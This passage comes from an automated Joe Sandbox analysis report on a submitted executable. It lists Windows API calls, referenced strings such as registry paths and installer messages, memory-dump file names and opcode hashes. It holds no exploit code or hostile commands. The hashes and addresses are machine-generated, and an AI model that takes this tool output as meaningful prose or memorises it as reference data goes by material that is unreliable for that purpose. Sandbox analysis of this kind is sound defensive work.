                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                          • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                          • String ID: Creating directory: %s
                                                                          • API String ID: 2451617938-483064649
                                                                          • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                          • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                          • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                          • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharMultiProcWide
                                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                                          • API String ID: 2508298434-591603554
                                                                          • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                          • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                          • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                          • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
                                                                          APIs
                                                                          • 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                          • 74D31500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                          • 74D31540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: D31500D31520D31540
                                                                          • String ID: j]I
                                                                          • API String ID: 1003763464-3121892809
                                                                          • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                          • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                          • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                          • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastProcess
                                                                          • String ID: XtE$ptE
                                                                          • API String ID: 2919029540-3149052308
                                                                          • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                          • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                          • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                          • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                          APIs
                                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 395431579-1506664499
                                                                          • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                          • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                          • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                          • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                          Strings
                                                                          • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                          • PendingFileRenameOperations, xrefs: 00454F5C
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-2115312317
                                                                          • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                          • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                          • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                          • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681), ref: 004712C1
                                                                          • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681,?), ref: 004712DF
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681), ref: 004713E3
                                                                          • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681,?), ref: 00471401
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                          • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                          • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                          • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                          • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                          • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                          • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                          • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                          APIs
                                                                          • GetMenu.USER32(00000000), ref: 00421371
                                                                          • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu
                                                                          • String ID:
                                                                          • API String ID: 3711407533-0
                                                                          • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                          • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                          • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                          • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                          APIs
                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                          • String ID:
                                                                          • API String ID: 601730667-0
                                                                          • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                          • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                          APIs
                                                                          • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                          • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                          • String ID:
                                                                          • API String ID: 4071923889-0
                                                                          • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                          • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                          • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                          • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                          • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                          • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A14620A480A570EnumFonts
                                                                          • String ID:
                                                                          • API String ID: 2780753366-0
                                                                          • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                          • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                          • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                          • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                          APIs
                                                                            • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                          Strings
                                                                          • EndOffset range exceeded, xrefs: 0045BAED
                                                                          • NumRecs range exceeded, xrefs: 0045BAB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlush
                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                          • API String ID: 3593489403-659731555
                                                                          • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                          • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                          • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                          • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                          APIs
                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                            • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                            • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                            • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049708E), ref: 00409B88
                                                                            • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                            • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                            • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                            • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                            • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                            • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                            • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                            • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                            • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                            • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                            • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                            • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                            • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                            • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                            • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                            • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                            • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                            • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                            • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                            • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                            • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
